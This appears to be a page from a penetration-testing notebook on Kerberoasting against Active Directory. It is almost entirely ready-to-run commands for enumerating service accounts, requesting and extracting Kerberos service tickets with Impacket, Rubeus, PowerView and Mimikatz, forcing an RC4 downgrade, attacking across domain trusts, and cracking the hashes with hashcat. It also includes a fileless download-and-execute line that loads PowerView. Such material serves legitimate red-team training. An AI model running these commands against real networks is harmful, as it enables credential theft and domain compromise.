KERBEROASTING

PRIMARY CATEGORY → KERBEROAST

Theory

Kerberoasting Attack

Enumeration - UNIX-like

Ldapsearch

Ldapsearch

Filter → '(&(ObjectClass=User)(servicePrincipalName=*))'

ldapsearch -LLL -x -H 'ldap://<TARGET>' -D '<USER>@<DOMAIN>' -w '<PASSWD>' -b 'DC=<DOMAIN>,DC=<TLD>' '(&(ObjectCategory=person)(ObjectClass=user)(servicePrincipalName=*))' samAccountName dn userPrincipalName servicePrincipalName | grep -viP --color -- '^#.+$'

Impacket’s GetUserSPNs.py

GetUserSPNs.py

GetUserSPNs.py -dc-ip <TARGET> '<DOMAIN>/<USER>:<PASSWD>'

Go-Windapsearch

Go-Windapsearch

windapsearch --domain '<DOMAIN>' --dc '<DC>' --username '<USER>' --password '<PASSWD>' --module user-spns

Enumeration - Windows

AD Powershell Module

Powershell AD Module

Setup

From a domain-joined host

Import-Module ActiveDirectory

Usage

Get-ADUser -Properties * -LdapFilter '(&(servicePrincipalName=*)(!(samAccountName=krbtgt))(!(UserA
ccountControl:1.2.840.113556.1.4.803:=2)))' | Select-Object samAccountname, servicePrincipalName

DSQuery

Local privileges required

dsquery * -Filter "(&(ObjectCategory=Person)(ObjectClass=user)(servicePrincipalName=*))" -Attr samAccountName servicePrincipalName

Powerview

Powerview.ps1

Powerview.ps1 - BC Security

Setup

Fileless

IEX (New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1')

Touching Disk

IWR -UseBasicParsing -Uri 'https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1' -OutFile '.\powerview.ps1'

Import-Module .\powerview.ps1

Usage

Get-DomainUser

Get-DomainUser -Spn | Select-Object samAccountName, ServicePrincipalName

Cross Forest Trust

Get-DomainUser -Spn -Domain '<TRUST_DOMAIN>' | Select samAccountName, ServicePrincipalName

Setspn.exe

Setspn.exe

setspn.exe -Q */*

Kerberoasting - UNIX-like

Impacket’s GetUserSPNs.py

GetUserSPNs.py -dc-ip <TARGET> -request -outputfile <OUTPUTFILE> '<DOMAIN>/<USER>:<PASSWD>'

Single TGS_REQ for a certain Service Account

GetUserSPNs.py -dc-ip <TARGET> -request-user <USER> -outputfile <OUTPUTFILE> '<DOMAIN>/<USER>:<PASSWD>'

Kerberoasting - Windows

Rubeus

Rubeus

Kerberoasting Summary

W/O requesting any Service Ticket

.\Rubeus.exe kerberoast /stats

We gather information such as the number of kerberoastable users and their support encryption type and password last set attributes

Kerberoasting for Privileged/Protected Service Accounts

LDAP Filter → adminCount=1

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap

Kerberoasting for a certain User Account

.\Rubeus.exe kerberoast /user:<USER> /nowrap

Forcing Downgrade Encryption

Valid for < Windows Server 2019

.\Rubeus.exe kerberoast /user:<USER> /tgtdeleg /nowrap

Powerview

Get-DomainUser + Get-DomainSPNTicket

Get-DomainUser -Identity <USER> | Get-DomainSPNTicket -Format Hashcat

Export all Service Tickets to a CSV File

Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation

SetSPN.exe + Powershell (.NET Class) + Mimikatz

Target a Service (User) Account’s SPN

SetSPN.exe

setspn.exe -Q */*

Request a ST via TGS_REQ for a certain SPN and Inject it in Memory

System.IdentityModel.Tokens.KerberosRequestorSecurityToken .Net Module via Powershell**

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"

Retrieve all Service Tickets - SetSPN + .NET Class
The oneliner below request a Service Ticket for each listed service account by setspn.exe via the System.IdentityModel.Tokens.KerberosRequestorSecurityToken .Net class
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

Extract Service Tickets from Memory with Mimikatz

Mimikatz.exe

base64 /out:true
kerberos::list /export

Converting Base64 Blob into a Kirbi File

base64 -d < <( echo -n "<BASE64_BLOB>" | tr -d '\n' ) > <OUTPUTFILE>.kirbi

Extracting a crackable hash format from a Kirbi file

Kirbi2john

python2.7 kirbi2john.py <KIRBI_FILE>

The above command extracts a crackable hash format for John the Ripper

In order to convert the resulting hash in a Hashcat crackable hash proceed as follows

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' <JOHN_HASH> > <HASHCAT_HASH>

Cracking the Kerberoasting Hash

Hashcat

Hashcat Type for RC4_HMAC_MD5 → 13100

hashcat --force -O --attack-mode 0 --hash-type 13100 <HASH> <WORDLIST>

Info

If the flags related to AES encryption are set in the UserAccountControl attribute of the given service account (user account), the KDC’s TGS will not encrypt the requested service ticket using RC4 but rather with the AES encryption algorithms, namely, AES256 and AES512

However, an operator could perform downgrade encryption by setting the encryption field with RC4_HMAC_MD5 as value in the TGS_REQ

Then, the KDC will encrypt the service ticket with the encryption algorithm specified by the kerberos client, regardless of the flags set in the UserAccountControl attribute of the service account

This behavior changes as Windows Server 2019, where the DC encrypts the service ticket with the most reliable encryption algorithm i.e. AES256. It also ignores any encryption downgrade performed by a kerberos client

Kerberoasting Across-Trust - UNIX-like

Enumeration

Impacket’s GetUserSPNs.py

GetUserSPNs.py

GetUserSPNs.py -target-domain '<TRUSTED_DOMAIN>' '<TRUSTEE_DOMAIN>/<USER>:<PASSWD>'

Kerberoasting

Impacket’s GetUserSPNs.py

GetUserSPNs.py

GetUserSPNs.py -target-domain '<TRUSTED_DOMAIN>' -request -outputfile '<OUTPUT_FILE>' '<TRUSTEE_DOMAIN>/<USER>:<PASSWD>'

Single TGS_REQ for a certain Service Account

GetUserSPNs.py -target-domain '<TRUSTED_DOMAIN>' -request-user '<SERVICE_ACCOUNT>' -outputfile '<OUTPUT_FILE>' '<TRUSTEE_DOMAIN>/<USER>:<PASSWD>'

Kerberoasting Across-Trust - Windows

Enumeration

Powerview

Powerview.ps1

Get-DomainUser -Domain '<TRUSTED_DOMAIN>' -SPN | Select samAccountName, servicePrincipalName

Kerberoasting

Powerview

Powerview.ps1

Get-DomainUser -Domain '<TRUSTED_DOMAIN>' -SPN | Get-DomainSPNTicket -Format Hashcat

Rubeus

Rubeus.exe

.\Rubeus.exe kerberoast /user:<USER> /domain:<TRUSTED_DOMAIN> /nowrap

Cracking

Hashcat

Hashcat Type → 13100

Usage

hashcat --force -O --attack-mode 0 --hash-type 13100 <HASH> <WORDLIST>

Display Result

hashcat --force -O --attack-mode 0 --hash-type 13100 <HASH> <WORDLIST> --show

💥Cyb3rBook

Explorer

KERBEROASTING

PRIMARY CATEGORY → KERBEROAST

Theory

Enumeration - UNIX-like

Ldapsearch

Impacket’s GetUserSPNs.py

Go-Windapsearch

Enumeration - Windows

AD Powershell Module

Setup

Usage

DSQuery

Powerview

Setup

Usage

Setspn.exe

Kerberoasting - UNIX-like

Impacket’s GetUserSPNs.py

Single TGS_REQ for a certain Service Account

Kerberoasting - Windows

Rubeus

Kerberoasting Summary

Kerberoasting for Privileged/Protected Service Accounts

Kerberoasting for a certain User Account

Powerview

Export all Service Tickets to a CSV File

SetSPN.exe + Powershell (.NET Class) + Mimikatz

Target a Service (User) Account’s SPN

Request a ST via TGS_REQ for a certain SPN and Inject it in Memory

Extract Service Tickets from Memory with Mimikatz

Converting Base64 Blob into a Kirbi File

Extracting a crackable hash format from a Kirbi file

Cracking the Kerberoasting Hash

Kerberoasting Across-Trust - UNIX-like

Enumeration

Impacket’s GetUserSPNs.py

Kerberoasting

Impacket’s GetUserSPNs.py

Single TGS_REQ for a certain Service Account

Kerberoasting Across-Trust - Windows

Enumeration

Powerview

Kerberoasting

Powerview

Rubeus

Cracking

Hashcat

Usage

Display Result

Graph View

Table of Contents

Backlinks